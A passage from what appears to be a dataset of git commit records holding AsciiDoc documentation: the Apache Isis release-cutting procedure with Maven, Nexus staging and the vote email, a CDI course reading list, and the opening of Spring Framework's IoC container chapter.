This is stored in the `src\/main\/appended-resources\/supplemental-models.xml` file, relative to the root of each releasable module.\n\nTo capture the missing license information, use:\n\n[source,bash]\n----\nmvn license:download-licenses && \\\ngroovy ..\/scripts\/checkmissinglicenses.groovy\n----\n\nThe Maven plugin creates a `license.xml` file in the `target\/generated-resources` directory of each module. The script then searches for these `licenses.xml` files, and compares them against the contents of the `supplemental-models.xml` file.\n\nFor example, the output could be something like:\n\n[source,bash]\n----\nlicenses to add to supplemental-models.xml:\n\n[org.slf4j, slf4j-api, 1.5.7]\n[org.codehaus.groovy, groovy-all, 1.7.2]\n\nlicenses to remove from supplemental-models.xml (are spurious):\n\n[org.slf4j, slf4j-api, 1.5.2]\n----\n\nIf any missing entries are listed or are spurious, then update `supplemental-models.xml` and try again.\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_commit-changes]]\n=== Commit changes\n\nCommit any changes from the preceding steps:\n\n[source,bash]\n----\ngit commit -am \"$ISISJIRA: updates to pom.xml etc for release\"\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_sanity-check]]\n=== Sanity check\n\nPerform one last sanity check on the codebase. 
Delete all Isis artifacts from your local Maven repo, then build using the `-o` offline flag:\n\n[source,bash]\n----\nrm -rf ~\/.m2\/repository\/org\/apache\/isis\nmvn clean install -o\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-prepare-dry-run]]\n=== Release prepare \"dry run\"\n\nMost of the work is done using the `mvn release:prepare` goal. Since this makes a lot of changes, we run it first in \"dry run\" mode; only if that works do we run the goal for real.\n\nRun the dry-run as follows:\n\n[source,bash]\n----\nmvn release:prepare -P apache-release -D dryRun=true \\\n -DreleaseVersion=$ISISREL \\\n -Dtag=$ISISART-$ISISREL \\\n -DdevelopmentVersion=$ISISDEV\n----\n\nYou may be prompted for the gpg passphrase.\n\n[NOTE]\n====\nExperiments in using `--batch-mode -Dgpg.passphrase="..."` to fully automate this didn't work; for more info, see http:\/\/maven.apache.org\/plugins\/maven-gpg-plugin\/sign-mojo.html[here] (maven release plugin docs) and http:\/\/maven.apache.org\/maven-release\/maven-release-plugin\/examples\/non-interactive-release.html[here] (maven gpg plugin docs).\n====\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-prepare-proper]]\n=== Release prepare \"proper\"\n\nAssuming this completes successfully, re-run the command, but without the `dryRun` flag and specifying `resume=false` (to ignore the generated `release.properties` file that gets generated as a side-effect of using `git`). You can also set the `skipTests` flag since they would have been run during the previous dry run:\n\n[source,bash]\n----\nmvn release:prepare -P apache-release -D resume=false -DskipTests=true \\\n -DreleaseVersion=$ISISREL \\\n -Dtag=$ISISART-$ISISREL \\\n -DdevelopmentVersion=$ISISDEV\n----\n\n\n[TIP]\n====\nIf there are any snags at this stage, then explicitly delete the generated `release.properties` file first before trying again.\n====\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_post-prepare-sanity-check]]\n=== Post-prepare sanity check\n\nYou should end up with artifacts in your local repo with the new version (eg `1.14.0`). This is a good time to do some quick sanity checks; nothing has yet been uploaded:\n\n* unzip the source-release ZIP and check it builds.\n* Inspect the `DEPENDENCIES` file, and check it looks correct.\n\nThese steps can be performed using the following script:\n\n[source]\n----\nrm -rf $ISISTMP\/$ISISART-$ISISREL\nmkdir $ISISTMP\/$ISISART-$ISISREL\n\nif [ \"$ISISCOR\" == \"Y\" ]; then\n ZIPDIR=\"$M2_REPO\/repository\/org\/apache\/isis\/core\/$ISISART\/$ISISREL\"\nelse\n ZIPDIR=\"$M2_REPO\/repository\/org\/apache\/isis\/$ISISCPT\/$ISISART\/$ISISREL\"\nfi\necho \"cp \\\"$ZIPDIR\/$ISISART-$ISISREL-source-release.zip\\\" $ISISTMP\/$ISISART-$ISISREL\/.\"\ncp \"$ZIPDIR\/$ISISART-$ISISREL-source-release.zip\" $ISISTMP\/$ISISART-$ISISREL\/.\n\npushd $ISISTMP\/$ISISART-$ISISREL\nunzip $ISISART-$ISISREL-source-release.zip\n\ncd $ISISART-$ISISREL\nmvn clean install\n\ncat DEPENDENCIES\n\npopd\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-perform-upload]]\n=== Release perform (Upload)\n\nOnce the release has been built locally, it should be uploaded for voting. This is done by deploying the Maven artifacts to a staging directory (this includes the source release ZIP file which will be voted upon).\n\nThe Apache staging repository runs on Nexus server, hosted at https:\/\/repository.apache.org[repository.apache.org]. 
The process of uploading will create a staging repository that is associated with the host (IP address) performing the release. Once the repository is staged, the newly created staging repository is \"closed\" in order to make it available to others.\n\nUse:\n\n[source,bash]\n----\nmvn release:perform -P apache-release \\\n -DworkingDirectory=$ISISTMP\/$ISISART-$ISISREL\/checkout\n----\n\nThe custom `workingDirectory` prevents file path issues if releasing on Windows. The command checks out the codebase from the tag, then builds the artifacts, then uploads them to the Apache staging repository:\n\n[source,bash]\n----\n...\n[INFO] --- maven-release-plugin:2.3.2:perform (default-cli) @ isis ---\n[INFO] Performing a LOCAL checkout from scm:git:file:\/\/\/C:\\APACHE\\isis-git-rw\\co\nre\n[INFO] Checking out the project to perform the release ...\n[INFO] Executing: cmd.exe \/X \/C \"git clone --branch release-1.14.0 file:\/\/\/C:\\APACHE\\isis-git-rw\\core C:\\APACHE\\isis-git-rw\\core\\target\\checkout\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\n[INFO] Performing a LOCAL checkout from scm:git:file:\/\/\/C:\\APACHE\\isis-git-rw\n[INFO] Checking out the project to perform the release ...\n[INFO] Executing: cmd.exe \/X \/C \"git clone --branch release-1.14.0 file:\/\/\/C:\\APACHE\\isis-git-rw C:\\APACHE\\isis-git-rw\\core\\target\\checkout\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\n[INFO] Executing: cmd.exe \/X \/C \"git ls-remote file:\/\/\/C:\\APACHE\\isis-git-rw\"\n[INFO] Working directory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\n[INFO] Executing: cmd.exe \/X \/C \"git fetch file:\/\/\/C:\\APACHE\\isis-git-rw\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Executing: cmd.exe \/X \/C \"git checkout release-1.14.0\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Executing: cmd.exe \/X \/C \"git ls-files\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Invoking perform goals in directory C:\\APACHE\\isis-git-rw\\core\\target\\checkout\\core\n[INFO] Executing goals 'deploy'...\n...\n----\n\nYou may (again) be prompted for gpg passphrase. All being well this command will complete successfully. Given that it is uploading code artifacts, it could take a while to complete.\n\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype]]\n== Releasing the Archetype\n\nApache Isis archetypes are reverse engineered from example applications. Once reverse engineered, the source is checked into git (replacing any earlier version of the archetype) and released.\n\nSwitch to the directory containing the `simpleapp` example:\n\n[source,bash]\n----\ncd ..\/example\/application\/simpleapp\n----\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_setup-environment-variables]]\n=== Setup environment variables\n\nSet additional environment variables for the `simpleapp-archetype` artifact:\n\n[source,bash]\n----\nexport ISISART=simpleapp-archetype\nexport ISISPAR=$ISISREL # <1>\n\nexport ISISCPT=$(echo $ISISART | cut -d- -f2)\nexport ISISCPN=$(echo $ISISART | cut -d- -f1)\n\nenv | grep ISIS | sort\n----\n<1> `$ISISPAR` is the version of the Apache Isis core that will act as the archetype's parent. 
Usually this is the same as `$ISISREL`.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_check-the-example-app]]\n=== Check the example app\n\nUpdate the parent `pom.xml` to reference the _released_ version of Apache Isis core, eg:\n\n[source,xml]\n----\n<properties>\n <isis.version>1.14.0<\/isis.version>\n ...\n<\/properties>\n----\n\n\n\nCheck for and fix any missing license header notices:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=50 -o && \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done || \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!AL' $a; done\n----\n\n\nFinally, double check that the app\n\n* builds:\n+\n[source,bash]\n----\nmvn clean install\n----\n\n* can be run from an IDE\n** mainClass=`org.apache.isis.WebServer`\n** args=`-m domainapp.app.DomainAppAppManifestWithFixtures`\n\n* can be run using the mvn jetty plugin:\n+\n[source,bash]\n----\npushd webapp\nmvn jetty:run\npopd\n----\n\n* can be deployed as a WAR\n+\n[source,bash]\n----\ncp webapp\/target\/simpleapp.war $CATALINA_HOME\/webapps\/ROOT.war\npushd $CATALINA_HOME\/bin\nsh startup.sh\ntail -f ..\/logs\/catalina.out\n----\n+\nquit using:\n+\n[source,bash]\n----\nsh shutdown.sh\npopd\n----\n\nIn each case, check the about page and confirm has been built against non-SNAPSHOT versions of the Apache Isis jars.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_create-the-archetype]]\n=== Create the archetype\n\nMake sure you are in the correct directory and environment variables are correct.\n\nTo recreate the *simpleapp* archetype:\n\n[source,bash]\n----\ncd example\/application\/simpleapp\nenv | grep ISIS | sort\n----\n\nThen, run the script:\n\n[source,bash]\n----\nsh ..\/..\/..\/scripts\/recreate-archetype.sh $ISISJIRA\n----\n\nThe script automatically commits changes; if you wish use `git log` and\n`git diff` (or a tool such as SourceTree) to review changes made.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_release-prepare]]\n=== Release prepare\n\nSwitch to the *archetype* directory and execute the `release:prepare`:\n\n[source]\n----\ncd ..\/..\/..\/example\/archetype\/$ISISCPN\nrm -rf $ISISTMP\/checkout\nmvn release:prepare -P apache-release \\\n -DreleaseVersion=$ISISREL \\\n -DdevelopmentVersion=$ISISDEV \\\n -Dtag=$ISISART-$ISISREL\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_post-prepare-sanity-check]]\n=== Post-prepare sanity check\n\nThis is a good point to test the archetype; nothing has yet been uploaded.\n\n_In a different session_, create a new app from the archetype. 
First set up environment variables:\n\n[source,bash]\n----\nexport ISISTMP=\/c\/tmp # or as required\nexport ISISCPN=simpleapp\nenv | grep ISIS | sort\n----\n\nThen generate a new app from the archetype:\n\n[source,bash]\n----\nrm -rf $ISISTMP\/test-$ISISCPN\n\nmkdir $ISISTMP\/test-$ISISCPN\ncd $ISISTMP\/test-$ISISCPN\nmvn archetype:generate \\\n -D archetypeCatalog=local \\\n -D groupId=com.mycompany \\\n -D artifactId=myapp \\\n -D archetypeGroupId=org.apache.isis.archetype \\\n -D archetypeArtifactId=$ISISCPN-archetype\n----\n\nBuild the newly generated app and test:\n\n[source,bash]\n----\ncd myapp\nmvn clean install\ncd webapp\nmvn jetty:run # runs as mvn jetty plugin\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_release-perform-upload]]\n=== Release Perform (upload)\n\nBack in the original session (in the *archetype* directory, `example\/archetype\/$ISISCPN`), execute `release:perform`:\n\n[source]\n----\nmvn release:perform -P apache-release \\\n -DworkingDirectory=$ISISTMP\/checkout\n----\n\nThis will upload the artifacts to the ASF Nexus repository.\n\n\n[[_cgcom_cutting-a-release_check-close-staging-repo]]\n== Check\/Close Staging Repo\n\nThe `mvn release:perform` commands will have put release artifacts for both `core` and the `simpleapp` archetype into a newly created staging repository on the ASF Nexus repository server.\n\nLog onto http:\/\/repository.apache.org[repository.apache.org] (using your ASF LDAP account):\n\nimage::{_imagesdir}release-process\/nexus-staging-0.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-0.png\"]\n\nAnd then check that the release has been staged (select `staging repositories` from left-hand side):\n\nimage::{_imagesdir}release-process\/nexus-staging-1.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-1.png\"]\n\nIf nothing appears in a staging repo you should stop here and work out why.\n\nAssuming that the repo has been populated, make a note of its repo id; this is needed for the voting thread. In the screenshot above the id is `org.apache.isis-008`.\n\n\nAfter checking that the staging repository contains the artifacts that you expect you should close the staging repository. This will make it available so that people can check the release.\n\nPress the Close button and complete the dialog:\n\nimage::{_imagesdir}release-process\/nexus-staging-2.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-2.png\"]\n\nNexus should start the process of closing the repository.\n\nimage::{_imagesdir}release-process\/nexus-staging-2a.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-2a.png\"]\n\nAll being well, the close should (eventually) complete successfully (keep hitting refresh):\n\nimage::{_imagesdir}release-process\/nexus-staging-3.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-3.png\"]\n\nThe Nexus repository manager will also email you with confirmation of a successful close.\n\nIf Nexus has problems with the key signature, however, then the close will be aborted:\n\nimage::{_imagesdir}release-process\/nexus-staging-4.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-4.png\"]\n\nUse `gpg --keyserver hkp:\/\/pgp.mit.edu --recv-keys nnnnnnnn` to confirm that the key is available.\n\n\n[NOTE]\n====\nUnfortunately, Nexus does not seem to allow subkeys to be used for signing. 
See xref:cgcom.adoc#_cgcom_key-generation[Key Generation] for more details.\n====\n\n\n\n[[_cgcom_cutting-a-release_push-branches]]\n== Push branches\n\nPush the release branch to origin:\n\n[source,bash]\n----\ngit push -u origin $ISISBRANCH\n----\n\nand also push tags for both core and the archetype:\n\n[source]\n----\ngit push origin refs\/tags\/isis-$ISISREL:refs\/tags\/isis-$ISISREL-$ISISRC\ngit push origin refs\/tags\/simpleapp-archetype-$ISISREL:refs\/tags\/simpleapp-archetype-$ISISREL-$ISISRC\ngit fetch\n----\n\n[NOTE]\n====\nThe remote tag isn't visible locally but can be seen https:\/\/git-wip-us.apache.org\/repos\/asf\/isis\/repo?p=isis.git;a=summary[online].\n====\n\n\n\n[[_cgcom_cutting-a-release_voting]]\n== Voting\n\nOnce the artifacts have been uploaded, you can call a vote.\n\nIn all cases, votes last for 72 hours and require a +3 (binding) vote from members.\n\n[[_cgcom_cutting-a-release_voting-start-voting-thread]]\n=== Start voting thread on link:mailto:dev@isis.apache.org[dev@isis.apache.org]\n\nThe following boilerplate is for a release of the Apache Isis Core. Adapt as required:\n\nUse the following subject, eg:\n\n[source,bash]\n----\n[VOTE] Apache Isis Core release 1.14.0 RC1\n----\n\nAnd use the following body:\n\n[source,bash]\n----\nI've cut a release for Apache Isis Core and the simpleapp archetype:\n\n* Core 1.14.0\n* SimpleApp Archetype 1.14.0\n\nThe source code artifacts have been uploaded to staging repositories on repository.apache.org:\n\n* http:\/\/repository.apache.org\/content\/repositories\/orgapacheisis-10xx\/org\/apache\/isis\/core\/isis\/1.14.0\/isis-1.14.0-source-release.zip\n* http:\/\/repository.apache.org\/content\/repositories\/orgapacheisis-10xx\/org\/apache\/isis\/archetype\/simpleapp-archetype\/1.14.0\/simpleapp-archetype-1.14.0-source-release.zip\n\nFor each zip there is a corresponding signature file (append .asc to the zip's url).\n\nIn the source code repo the code has been tagged as isis-1.14.0-RC1 and simpleapp-archetype-1.14.0-RC1; see https:\/\/git-wip-us.apache.org\/repos\/asf?p=isis.git\n\nFor instructions on how to verify the release (build from binaries and\/or use in Maven directly), see http:\/\/isis.apache.org\/guides\/cgcom.html#_cgcom_verifying-releases\n\nPlease verify the release and cast your vote. 
The vote will be open for a minimum of 72 hours.\n\n[ ] +1\n[ ] 0\n[ ] -1\n----\n\nRemember to update:\n\n* the version number (1.14.0 or whatever)\n* the release candidate number (`RC1` or whatever)\n* the repository id, as provided by Nexus earlier (`orgapacheisis-10xx` or whatever)\n\nNote that the email also references the procedure for other committers to xref:cgcom.adoc#_cgcom_verifying-releases[verify the release].\n\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c48b4d4126fbf5bdbac91c517037b4e0b057e0e6","subject":"Link (direct) to pres","message":"Link (direct) to pres\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"CDI\/README.adoc","new_file":"CDI\/README.adoc","new_contents":"= CDI\n\nSee: https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Git\/Pr%C3%A9sentation\/presentation.pdf[Pr\u00e9sentation].\n\nHere are some references about CDI (Context Dependency Injection).\n\n* The Java EE Tutorial: http:\/\/docs.oracle.com\/javaee\/7\/tutorial\/partcdi.htm[Contexts and Dependency Injection]\n* Goncalves - Beginning Java EE 7 (2013)\n* https:\/\/jcp.org\/en\/jsr\/detail?id=346[JSR 346] (Context and Dependency Injection 1.1 and 1.2) (http:\/\/download.oracle.com\/otn-pub\/jcp\/cdi-1_2-mrel-eval-spec\/cdi-1.2.pdf[PDF])\n* https:\/\/jcp.org\/en\/jsr\/detail?id=330[JSR 330] (Dependency Injection) (http:\/\/download.oracle.com\/otn-pub\/jcp\/dependency_injection-1.0-final-oth-JSpec\/dependency_injection-1_0-final-spec.zip[zip]): only doc about http:\/\/docs.oracle.com\/javaee\/7\/api\/javax\/inject\/Inject.html[`@Inject`] and similar\n* JSR 330, https:\/\/jcp.org\/en\/jsr\/detail?id=330#4[section 4]: short description of the utility of DI\n* https:\/\/jcp.org\/en\/jsr\/detail?id=342[JSR 342] (Java EE 7) (http:\/\/download.oracle.com\/otn-pub\/jcp\/java_ee-7-mrel-eval-spec\/JavaEE_Platform_Spec.pdf[PDF])\n* https:\/\/jcp.org\/en\/jsr\/detail?id=345[JSR 345] (EJB 3.2) (http:\/\/download.oracle.com\/otn-pub\/jcp\/ejb-3_2-fr-eval-spec\/ejb-3_2-core-fr-spec.pdf[PDF])\n\n","old_contents":"= CDI\n\nSee: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/Pr%C3%A9sentation\/presentation.pdf[Pr\u00e9sentation].\n\nHere are some references about CDI (Context Dependency Injection).\n\n* The Java EE Tutorial: http:\/\/docs.oracle.com\/javaee\/7\/tutorial\/partcdi.htm[Contexts and Dependency Injection]\n* Goncalves - Beginning Java EE 7 (2013)\n* https:\/\/jcp.org\/en\/jsr\/detail?id=346[JSR 346] (Context and Dependency Injection 1.1 and 1.2) (http:\/\/download.oracle.com\/otn-pub\/jcp\/cdi-1_2-mrel-eval-spec\/cdi-1.2.pdf[PDF])\n* https:\/\/jcp.org\/en\/jsr\/detail?id=330[JSR 330] (Dependency Injection) (http:\/\/download.oracle.com\/otn-pub\/jcp\/dependency_injection-1.0-final-oth-JSpec\/dependency_injection-1_0-final-spec.zip[zip]): only doc about http:\/\/docs.oracle.com\/javaee\/7\/api\/javax\/inject\/Inject.html[`@Inject`] and similar\n* JSR 330, https:\/\/jcp.org\/en\/jsr\/detail?id=330#4[section 4]: short description of the utility of DI\n* https:\/\/jcp.org\/en\/jsr\/detail?id=342[JSR 342] (Java EE 7) (http:\/\/download.oracle.com\/otn-pub\/jcp\/java_ee-7-mrel-eval-spec\/JavaEE_Platform_Spec.pdf[PDF])\n* https:\/\/jcp.org\/en\/jsr\/detail?id=345[JSR 345] (EJB 3.2) (http:\/\/download.oracle.com\/otn-pub\/jcp\/ejb-3_2-fr-eval-spec\/ejb-3_2-core-fr-spec.pdf[PDF])\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} 
{"commit":"69116c2acc3881040686da594ced49cb9a964eb5","subject":"Documentation for InjectionPoint argument on @Bean method","message":"Documentation for InjectionPoint argument on @Bean method\n\nIssue: SPR-14797\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/core-beans.adoc","new_file":"src\/asciidoc\/core-beans.adoc","new_contents":"[[beans]]\n= The IoC container\n\n\n[[beans-introduction]]\n== Introduction to the Spring IoC container and beans\nThis chapter covers the Spring Framework implementation of the Inversion of Control\n(IoC) footnote:[See pass:specialcharacters,macros[<<background-ioc>>] ] principle. IoC\nis also known as __dependency injection__ (DI). It is a process whereby objects define\ntheir dependencies, that is, the other objects they work with, only through constructor\narguments, arguments to a factory method, or properties that are set on the object\ninstance after it is constructed or returned from a factory method. The container then\n__injects__ those dependencies when it creates the bean. This process is fundamentally\nthe inverse, hence the name __Inversion of Control__ (IoC), of the bean itself\ncontrolling the instantiation or location of its dependencies by using direct\nconstruction of classes, or a mechanism such as the __Service Locator__ pattern.\n\nThe `org.springframework.beans` and `org.springframework.context` packages are the basis\nfor Spring Framework's IoC container. The\n{api-spring-framework}\/beans\/factory\/BeanFactory.html[`BeanFactory`]\ninterface provides an advanced configuration mechanism capable of managing any type of\nobject.\n{api-spring-framework}\/context\/ApplicationContext.html[`ApplicationContext`]\nis a sub-interface of `BeanFactory`. It adds easier integration with Spring's AOP\nfeatures; message resource handling (for use in internationalization), event\npublication; and application-layer specific contexts such as the `WebApplicationContext`\nfor use in web applications.\n\nIn short, the `BeanFactory` provides the configuration framework and basic\nfunctionality, and the `ApplicationContext` adds more enterprise-specific functionality.\nThe `ApplicationContext` is a complete superset of the `BeanFactory`, and is used\nexclusively in this chapter in descriptions of Spring's IoC container. For more\ninformation on using the `BeanFactory` instead of the `ApplicationContext,` refer to\n<<beans-beanfactory>>.\n\nIn Spring, the objects that form the backbone of your application and that are managed\nby the Spring IoC __container__ are called __beans__. A bean is an object that is\ninstantiated, assembled, and otherwise managed by a Spring IoC container. Otherwise, a\nbean is simply one of many objects in your application. Beans, and the __dependencies__\namong them, are reflected in the __configuration metadata__ used by a container.\n\n\n\n\n[[beans-basics]]\n== Container overview\nThe interface `org.springframework.context.ApplicationContext` represents the Spring IoC\ncontainer and is responsible for instantiating, configuring, and assembling the\naforementioned beans. The container gets its instructions on what objects to\ninstantiate, configure, and assemble by reading configuration metadata. The\nconfiguration metadata is represented in XML, Java annotations, or Java code. 
It allows\nyou to express the objects that compose your application and the rich interdependencies\nbetween such objects.\n\nSeveral implementations of the `ApplicationContext` interface are supplied\nout-of-the-box with Spring. In standalone applications it is common to create an\ninstance of\n{api-spring-framework}\/context\/support\/ClassPathXmlApplicationContext.html[`ClassPathXmlApplicationContext`]\nor {api-spring-framework}\/context\/support\/FileSystemXmlApplicationContext.html[`FileSystemXmlApplicationContext`].\nWhile XML has been the traditional format for defining configuration metadata, you can\ninstruct the container to use Java annotations or code as the metadata format by\nproviding a small amount of XML configuration to declaratively enable support for these\nadditional metadata formats.\n\nIn most application scenarios, explicit user code is not required to instantiate one or\nmore instances of a Spring IoC container. For example, in a web application scenario, some\neight (or so) lines of boilerplate web descriptor XML in the `web.xml` file\nof the application will typically suffice (see <<context-create>>). If you are using the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite] Eclipse-powered development\nenvironment, this boilerplate configuration can be easily created with a few mouse clicks or\nkeystrokes.\n\nThe following diagram is a high-level view of how Spring works. Your application classes\nare combined with configuration metadata so that after the `ApplicationContext` is\ncreated and initialized, you have a fully configured and executable system or\napplication.\n\n.The Spring IoC container\nimage::images\/container-magic.png[width=250]\n\n\n\n[[beans-factory-metadata]]\n=== Configuration metadata\n\nAs the preceding diagram shows, the Spring IoC container consumes a form of\n__configuration metadata__; this configuration metadata represents how you as an\napplication developer tell the Spring container to instantiate, configure, and assemble\nthe objects in your application.\n\nConfiguration metadata is traditionally supplied in a simple and intuitive XML format,\nwhich is what most of this chapter uses to convey key concepts and features of the\nSpring IoC container.\n\n[NOTE]\n====\nXML-based metadata is __not__ the only allowed form of configuration metadata. The\nSpring IoC container itself is __totally__ decoupled from the format in which this\nconfiguration metadata is actually written. These days many developers choose\n<<beans-java,Java-based configuration>> for their Spring applications.\n====\n\nFor information about using other forms of metadata with the Spring container, see:\n\n* <<beans-annotation-config,Annotation-based configuration>>: Spring 2.5 introduced\n support for annotation-based configuration metadata.\n* <<beans-java,Java-based configuration>>: Starting with Spring 3.0, many features\n provided by the Spring JavaConfig project became part of the core Spring Framework.\n Thus you can define beans external to your application classes by using Java rather\n than XML files. To use these new features, see the `@Configuration`, `@Bean`, `@Import`\n and `@DependsOn` annotations.\n\nSpring configuration consists of at least one and typically more than one bean\ndefinition that the container must manage. XML-based configuration metadata shows these\nbeans configured as `<bean\/>` elements inside a top-level `<beans\/>` element. Java\nconfiguration typically uses `@Bean` annotated methods within a `@Configuration` class.\n
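\nAs a small illustration of the Java style (a sketch only; it reuses the `PetStoreServiceImpl` class that appears in the XML examples below):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t\/\/ plays the same role as a <bean id=\"petStore\"\/> element in XML\n\t\t@Bean\n\t\tpublic PetStoreService petStore() {\n\t\t\treturn new PetStoreServiceImpl();\n\t\t}\n\t}\n----\n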
\nThese bean definitions correspond to the actual objects that make up your application.\nTypically you define service layer objects, data access objects (DAOs), presentation\nobjects such as Struts `Action` instances, infrastructure objects such as Hibernate\n`SessionFactories`, JMS `Queues`, and so forth. Typically one does not configure\nfine-grained domain objects in the container, because it is usually the responsibility\nof DAOs and business logic to create and load domain objects. However, you can use\nSpring's integration with AspectJ to configure objects that have been created outside\nthe control of an IoC container. See <<aop-atconfigurable,Using AspectJ to\ndependency-inject domain objects with Spring>>.\n\nThe following example shows the basic structure of XML-based configuration metadata:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"...\" class=\"...\">\n\t\t\t<!-- collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<bean id=\"...\" class=\"...\">\n\t\t\t<!-- collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions go here -->\n\n\t<\/beans>\n----\n\nThe `id` attribute is a string that you use to identify the individual bean definition.\nThe `class` attribute defines the type of the bean and uses the fully qualified\nclassname. The value of the `id` attribute can be used to refer to collaborating objects. The XML for\nreferring to collaborating objects is not shown in this example; see\n<<beans-dependencies,Dependencies>> for more information.\n\n\n\n[[beans-factory-instantiation]]\n=== Instantiating a container\n\nInstantiating a Spring IoC container is straightforward. The location path or paths\nsupplied to an `ApplicationContext` constructor are actually resource strings that allow\nthe container to load configuration metadata from a variety of external resources such\nas the local file system, the Java `CLASSPATH`, and so on.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tApplicationContext context =\n\t\tnew ClassPathXmlApplicationContext(new String[] {\"services.xml\", \"daos.xml\"});\n----\n\n[NOTE]\n====\nAfter you learn about Spring's IoC container, you may want to know more about Spring's\n`Resource` abstraction, as described in <<resources>>, which provides a convenient\nmechanism for reading an InputStream from locations defined in a URI syntax. 
In particular, `Resource` paths are used to construct application contexts, as described in\n<<resources-app-ctx>>.\n====\n\nThe following example shows the configuration file for the service layer objects (`services.xml`):\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- services -->\n\n\t\t<bean id=\"petStore\" class=\"org.springframework.samples.jpetstore.services.PetStoreServiceImpl\">\n\t\t\t<property name=\"accountDao\" ref=\"accountDao\"\/>\n\t\t\t<property name=\"itemDao\" ref=\"itemDao\"\/>\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions for services go here -->\n\n\t<\/beans>\n----\n\nThe following example shows the `daos.xml` file for the data access objects:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"accountDao\"\n\t\t\tclass=\"org.springframework.samples.jpetstore.dao.jpa.JpaAccountDao\">\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<bean id=\"itemDao\" class=\"org.springframework.samples.jpetstore.dao.jpa.JpaItemDao\">\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions for data access objects go here -->\n\n\t<\/beans>\n----\n\nIn the preceding example, the service layer consists of the class `PetStoreServiceImpl`,\nand two data access objects of the types `JpaAccountDao` and `JpaItemDao` (based\non the JPA Object\/Relational mapping standard). The `name` attribute of the `<property\/>` element refers to the\nname of the JavaBean property, and its `ref` attribute refers to the name of another bean\ndefinition. This linkage between `id` and `ref` attributes expresses the dependency between\ncollaborating objects. For details of configuring an object's dependencies, see\n<<beans-dependencies,Dependencies>>.\n\n\n[[beans-factory-xml-import]]\n==== Composing XML-based configuration metadata\n\nIt can be useful to have bean definitions span multiple XML files. Often each individual\nXML configuration file represents a logical layer or module in your architecture.\n\nYou can use the application context constructor to load bean definitions from all these\nXML fragments. This constructor takes multiple `Resource` locations, as was shown in 